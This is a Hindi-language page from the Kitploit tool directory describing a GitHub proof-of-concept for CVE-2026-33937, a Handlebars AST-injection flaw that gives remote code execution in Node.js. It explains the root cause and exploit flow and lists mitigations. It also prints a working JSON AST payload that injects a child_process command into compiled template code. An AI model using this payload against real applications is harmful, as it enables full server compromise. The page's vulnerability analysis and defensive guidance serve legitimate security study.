Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dinhvaren/cve-2026-33937
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेलोड डेवलपमेंट
GitHubdinhvaren/cve-2026-33937

cve-2026-33937

CVE-2026-33937 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Handlebars AST इंजेक्शन भेद्यता है जो Node.js में रिमोट कोड निष्पादन की ओर ले जाती है। निर्मित AST पेलोड का प्रदर्शन करता है और शमन मार्गदर्शन प्रदान करता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33937 - Handlebars RCE एक्सप्लॉइट PoC

विवरण

CVE-2026-33937 Handlebars में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, जो एब्स्ट्रैक्ट सिंटैक्स ट्री (AST) इनपुट के असुरक्षित हैंडलिंग के कारण होती है।

यह भेद्यता हमलावरों को Handlebars.compile() में एक क्राफ्टेड AST ऑब्जेक्ट प्रदान करके मनमाना JavaScript कोड इंजेक्ट करने की अनुमति देती है।

मूल कारण

Handlebars.compile() दोनों को स्वीकार करता है:

  • टेम्पलेट स्ट्रिंग
  • प्री-पार्स्ड AST ऑब्जेक्ट

जब एक AST ऑब्जेक्ट प्रदान किया जाता है, तो पार्सिंग चरण को छोड़ दिया जाता है।

अंदर:

root@kitploit:~

lib/handlebars/compiler/javascript-compiler.js

फ़ंक्शन:

root@kitploit:~
NumberLiteral(number) {
  this.pushStackLiteral(number.value);
}

सीधे number.value को जनरेटेड JavaScript कोड में इंसर्ट करता है, जिससे कोड इंजेक्शन होता है।

बिना सैनिटाइज़ेशन या एस्केपिंग के

प्रभाव

  • रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • पूर्ण सर्वर समझौता
  • Node.js वातावरण में मनमाना JavaScript एक्ज़ीक्यूशन

एक्सप्लॉइट फ्लो

root@kitploit:~
Attacker → Crafted AST (JSON)
        │
        ▼
Handlebars.compile()
        │
        ▼
Compiler.compile()
        │
        ▼
JavaScriptCompiler (NumberLiteral injection)
        │
        ▼
Code generation
        │
        ▼
new Function(...) / eval()
        │
        ▼
       RCE

प्रूफ ऑफ कॉन्सेप्ट (PoC)

root@kitploit:~
{
  "type": "Program",
  "body": [
    {
      "type": "MustacheStatement",
      "path": {
        "type": "PathExpression",
        "data": false,
        "depth": 0,
        "parts": ["lookup"],
        "original": "lookup",
        "loc": null
      },
      "params": [
        {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": [],
          "original": "this",
          "loc": null
        },
        {
          "type": "NumberLiteral",
          "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
          "original": 1,
          "loc": null
        }
      ],
      "escaped": true,
      "strip": { "open": false, "close": false },
      "loc": null
    }
  ],
  "strip": {},
  "loc": null
}

प्रभावित संस्करण

  • Handlebars <= 4.7.8

शमन

  • अविश्वसनीय AST इनपुट की अनुमति न दें
  • सभी टेम्पलेट इनपुट को मान्य और सैनिटाइज़ करें
  • Handlebars के पैच किए गए संस्करण में अपग्रेड करें

संदर्भ

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33937
टूल डाउनलोड करें